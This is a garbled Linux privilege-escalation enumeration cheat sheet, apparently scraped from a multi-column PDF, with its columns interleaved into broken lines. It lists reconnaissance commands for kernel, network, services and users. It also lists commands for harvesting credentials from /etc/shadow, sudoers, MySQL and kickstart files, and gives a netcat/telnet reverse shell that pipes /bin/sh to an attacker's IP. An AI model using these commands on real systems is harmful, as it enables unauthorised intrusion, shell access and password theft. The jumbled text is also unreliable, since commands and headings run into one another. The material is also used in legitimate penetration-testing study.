Professional Documents
Culture Documents
cat /etc/network/interfaces
uname -a
ps aux | grep root cat /etc/sysconfig/network
uname -mrs
ps -ef | grep root
rpm -q kernel What Network configuration
dmesg | grep Linux
Installed Application & Version settings ? What about Network
ls /boot | grep vmlinuz- ls -alh /usr/bin/
Environmental variables ls -alh /sbin/ ? DHCP server? DNS server?
dpkg -l
cat /etc/profile
rpm -qa Gateway?
cat /etc/bashrc
ls -alh /var/cache/apt/archivesO
cat ~/.bash_profile cat /etc/resolv.conf
ls -alh /var/cache/yum/
cat ~/.bashrc cat ~/.bash_logout cat /etc/sysconfig/network
env Service(s) settings misconfigured cat /etc/networks
set iptables -L
& Check if Vulnerability Occurs hostname
Is there a printer? cat /etc/syslog.conf dnsdomainname
cat /etc/chttp.conf
lpstat -a
cat /etc/lighttpd.conf Other users & hosts
Interesting in the cat /etc/cups/cupsd.conf communicating with the system?
cat /etc/inetd.conf
home directorie(s)? cat /etc/apache2/apache2.conf lsof -i
Have you got a shell? Can Confidential Information & Users Who are you? Who is logged in?
you interact with the Who has been logged in? Who else is there? Who can do what?
system? id
who Are there any passwords in; scripts,
nc -lvp 4444 # Attacker. Input (Commands) w
nc -lvp 4445 # Attacker. Ouput (Results) last databases, configuration files or log
telnet [attackers ip] 44444 | /bin/sh | [local ip] cat /etc/passwd | cut -d: -f1
44445 # On the targets system. Use the attackers # List of users files? Default paths and locations for
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'
IP!
# List of super users passwords
awk -F: '($3 == "0") {print}' /etc/passwd
What sensitive files can be # List of super users cat /var/apache2/config.inc
cat /etc/sudoers sudo -l cat /var/lib/mysql/mysql/user.MYD
found? cat /root/anaconda-ks.cfg
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/
@Aacle_